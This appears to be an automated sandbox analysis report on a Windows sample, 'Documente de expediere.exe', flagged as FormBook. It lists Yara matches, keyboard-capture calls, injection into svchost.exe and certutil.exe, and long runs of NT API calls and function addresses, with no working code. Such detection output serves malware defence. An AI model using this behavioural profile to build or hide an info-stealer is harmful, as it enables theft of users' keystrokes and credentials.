            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006F0219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_006F0219
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_0071CDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0071CDAC

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000E.00000002.3713805727.0000000005200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1543869088.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.3705034612.00000000032A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1543109899.0000000000660000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.3713859842.0000000002ED0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1542537853.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.3713610097.00000000051C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.3716040439.0000000004F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000E.00000002.3713805727.0000000005200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1543869088.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000E.00000002.3705034612.00000000032A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1543109899.0000000000660000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000D.00000002.3713859842.0000000002ED0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1542537853.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000E.00000002.3713610097.00000000051C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000F.00000002.3716040439.0000000004F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Binary is likely a compiled AutoIt script file
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: This is a third-party compiled AutoIt script.0_2_00693B4C
            Source: Documente de expediere.exeString found in binary or memory: This is a third-party compiled AutoIt script.
            Source: Documente de expediere.exe, 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_0fe06337-7
            Source: Documente de expediere.exe, 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_7c424068-4
            Source: Documente de expediere.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_d2dd3198-b
            Source: Documente de expediere.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_deae39c8-5
            Initial sample is a PE file and has a suspicious name
            Source: initial sampleStatic PE information: Filename: Documente de expediere.exe
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042B3A3 NtClose,2_2_0042B3A3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072B60 NtClose,LdrInitializeThunk,2_2_03072B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03072DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030735C0 NtCreateMutant,LdrInitializeThunk,2_2_030735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03074340 NtSetContextThread,2_2_03074340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03074650 NtSuspendThread,2_2_03074650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072B80 NtQueryInformationFile,2_2_03072B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072BA0 NtEnumerateValueKey,2_2_03072BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072BE0 NtQueryValueKey,2_2_03072BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072BF0 NtAllocateVirtualMemory,2_2_03072BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072AB0 NtWaitForSingleObject,2_2_03072AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072AD0 NtReadFile,2_2_03072AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072AF0 NtWriteFile,2_2_03072AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072F30 NtCreateSection,2_2_03072F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072F60 NtCreateProcessEx,2_2_03072F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072F90 NtProtectVirtualMemory,2_2_03072F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072FA0 NtQuerySection,2_2_03072FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072FB0 NtResumeThread,2_2_03072FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072FE0 NtCreateFile,2_2_03072FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072E30 NtWriteVirtualMemory,2_2_03072E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072E80 NtReadVirtualMemory,2_2_03072E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072EA0 NtAdjustPrivilegesToken,2_2_03072EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072EE0 NtQueueApcThread,2_2_03072EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072D00 NtSetInformationFile,2_2_03072D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072D10 NtMapViewOfSection,2_2_03072D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072D30 NtUnmapViewOfSection,2_2_03072D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072DB0 NtEnumerateKey,2_2_03072DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072DD0 NtDelayExecution,2_2_03072DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072C00 NtQueryInformationProcess,2_2_03072C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072C60 NtCreateKey,2_2_03072C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072C70 NtFreeVirtualMemory,2_2_03072C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072CA0 NtQueryInformationToken,2_2_03072CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072CC0 NtQueryVirtualMemory,2_2_03072CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072CF0 NtOpenProcess,2_2_03072CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03073010 NtOpenDirectoryObject,2_2_03073010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03073090 NtSetValueKey,2_2_03073090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030739B0 NtGetContextThread,2_2_030739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03073D10 NtOpenProcessToken,2_2_03073D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03073D70 NtOpenThread,2_2_03073D70
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_05654650 NtSuspendThread,LdrInitializeThunk,14_2_05654650
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_05654340 NtSetContextThread,LdrInitializeThunk,14_2_05654340
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_05652D30 NtUnmapViewOfSection,LdrInitializeThunk,14_2_05652D30
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_05652D10 NtMapViewOfSection,LdrInitializeThunk,14_2_05652D10
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_05652DF0 NtQuerySystemInformation,LdrInitializeThunk,14_2_05652DF0
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_05652DD0 NtDelayExecution,LdrInitializeThunk,14_2_05652DD0
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_05652C60 NtCreateKey,LdrInitializeThunk,14_2_05652C60
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_05652C70 NtFreeVirtualMemory,LdrInitializeThunk,14_2_05652C70
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_05652CA0 NtQueryInformationToken,LdrInitializeThunk,14_2_05652CA0
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_05652F30 NtCreateSection,LdrInitializeThunk,14_2_05652F30
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_05652FE0 NtCreateFile,LdrInitializeThunk,14_2_05652FE0
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_05652FB0 NtResumeThread,LdrInitializeThunk,14_2_05652FB0
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_05652EE0 NtQueueApcThread,LdrInitializeThunk,14_2_05652EE0
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_05652E80 NtReadVirtualMemory,LdrInitializeThunk,14_2_05652E80
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_05652B60 NtClose,LdrInitializeThunk,14_2_05652B60
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_05652BE0 NtQueryValueKey,LdrInitializeThunk,14_2_05652BE0
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_05652BF0 NtAllocateVirtualMemory,LdrInitializeThunk,14_2_05652BF0
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_05652BA0 NtEnumerateValueKey,LdrInitializeThunk,14_2_05652BA0
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_05652AF0 NtWriteFile,LdrInitializeThunk,14_2_05652AF0
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_05652AD0 NtReadFile,LdrInitializeThunk,14_2_05652AD0
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_056535C0 NtCreateMutant,LdrInitializeThunk,14_2_056535C0
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_056539B0 NtGetContextThread,LdrInitializeThunk,14_2_056539B0
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_05652D00 NtSetInformationFile,14_2_05652D00
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_05652DB0 NtEnumerateKey,14_2_05652DB0
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_05652C00 NtQueryInformationProcess,14_2_05652C00
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_05652CF0 NtOpenProcess,14_2_05652CF0
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_05652CC0 NtQueryVirtualMemory,14_2_05652CC0
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_05652F60 NtCreateProcessEx,14_2_05652F60
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_05652FA0 NtQuerySection,14_2_05652FA0
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_05652F90 NtProtectVirtualMemory,14_2_05652F90
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_05652E30 NtWriteVirtualMemory,14_2_05652E30
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_05652EA0 NtAdjustPrivilegesToken,14_2_05652EA0
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_05652B80 NtQueryInformationFile,14_2_05652B80
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_05652AB0 NtWaitForSingleObject,14_2_05652AB0
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_05653010 NtOpenDirectoryObject,14_2_05653010
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_05653090 NtSetValueKey,14_2_05653090
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_05653D70 NtOpenThread,14_2_05653D70
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_05653D10 NtOpenProcessToken,14_2_05653D10
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_032C80F0 NtAllocateVirtualMemory,14_2_032C80F0
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_032C7F10 NtDeleteFile,14_2_032C7F10
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_032C7FA0 NtClose,14_2_032C7FA0
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_032C7E30 NtReadFile,14_2_032C7E30
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_032C7CD0 NtCreateFile,14_2_032C7CD0
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006F4021: CreateFileW,DeviceIoControl,CloseHandle,0_2_006F4021
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006E8858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_006E8858
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006F545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_006F545F
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_0069E8000_2_0069E800
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006BDBB50_2_006BDBB5
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_0069E0600_2_0069E060
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_0071804A0_2_0071804A
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006A41400_2_006A4140
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006B24050_2_006B2405
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006C65220_2_006C6522
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006C267E0_2_006C267E
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_007106650_2_00710665
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006A68430_2_006A6843
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006B283A0_2_006B283A
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006C89DF0_2_006C89DF
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006A8A0E0_2_006A8A0E
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_00710AE20_2_00710AE2
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006C6A940_2_006C6A94
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006EEB070_2_006EEB07
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006F8B130_2_006F8B13
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006BCD610_2_006BCD61
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006C70060_2_006C7006
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006A710E0_2_006A710E
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006A31900_2_006A3190
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006912870_2_00691287
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006B33C70_2_006B33C7
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006BF4190_2_006BF419
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006B16C40_2_006B16C4
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006A56800_2_006A5680
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006A58C00_2_006A58C0
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006B78D30_2_006B78D3
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006B1BB80_2_006B1BB8
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006C9D050_2_006C9D05
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_0069FE400_2_0069FE40
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006BBFE60_2_006BBFE6
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006B1FD00_2_006B1FD0
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_015436700_2_01543670
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004010C02_2_004010C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041688E2_2_0041688E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004168932_2_00416893
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004010B92_2_004010B9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004031502_2_00403150
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004101632_2_00410163
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E1E32_2_0040E1E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004012502_2_00401250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004024D02_2_004024D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004015402_2_00401540
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FF432_2_0040FF43
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042D7D32_2_0042D7D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FA3522_2_030FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E3F02_2_0304E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031003E62_2_031003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E02742_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C02C02_2_030C02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030301002_2_03030100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DA1182_2_030DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C81582_2_030C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F41A22_2_030F41A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031001AA2_2_031001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F81CC2_2_030F81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D20002_2_030D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030647502_2_03064750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030407702_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303C7C02_2_0303C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305C6E02_2_0305C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030405352_2_03040535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031005912_2_03100591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E44202_2_030E4420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F24462_2_030F2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EE4F62_2_030EE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FAB402_2_030FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F6BD72_2_030F6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA802_2_0303EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030569622_2_03056962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A02_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0310A9A62_2_0310A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304A8402_2_0304A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030428402_2_03042840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030268B82_2_030268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E8F02_2_0306E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03082F282_2_03082F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03060F302_2_03060F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E2F302_2_030E2F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B4F402_2_030B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BEFA02_2_030BEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03032FC82_2_03032FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304CFE02_2_0304CFE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FEE262_2_030FEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040E592_2_03040E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03052E902_2_03052E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FCE932_2_030FCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FEEDB2_2_030FEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304AD002_2_0304AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DCD1F2_2_030DCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03058DBF2_2_03058DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303ADE02_2_0303ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040C002_2_03040C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0CB52_2_030E0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030CF22_2_03030CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F132D2_2_030F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302D34C2_2_0302D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0308739A2_2_0308739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030452A02_2_030452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305B2C02_2_0305B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E12ED2_2_030E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0307516C2_2_0307516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302F1722_2_0302F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0310B16B2_2_0310B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304B1B02_2_0304B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EF0CC2_2_030EF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030470C02_2_030470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F70E92_2_030F70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FF0E02_2_030FF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FF7B02_2_030FF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030856302_2_03085630
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F16CC2_2_030F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F75712_2_030F7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DD5B02_2_030DD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FF43F2_2_030FF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030314602_2_03031460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FFB762_2_030FFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305FB802_2_0305FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B5BF02_2_030B5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0307DBF92_2_0307DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FFA492_2_030FFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F7A462_2_030F7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B3A6C2_2_030B3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DDAAC2_2_030DDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03085AA02_2_03085AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E1AA32_2_030E1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EDAC62_2_030EDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D59102_2_030D5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030499502_2_03049950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305B9502_2_0305B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AD8002_2_030AD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030438E02_2_030438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FFF092_2_030FFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03041F922_2_03041F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FFFB12_2_030FFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03003FD22_2_03003FD2
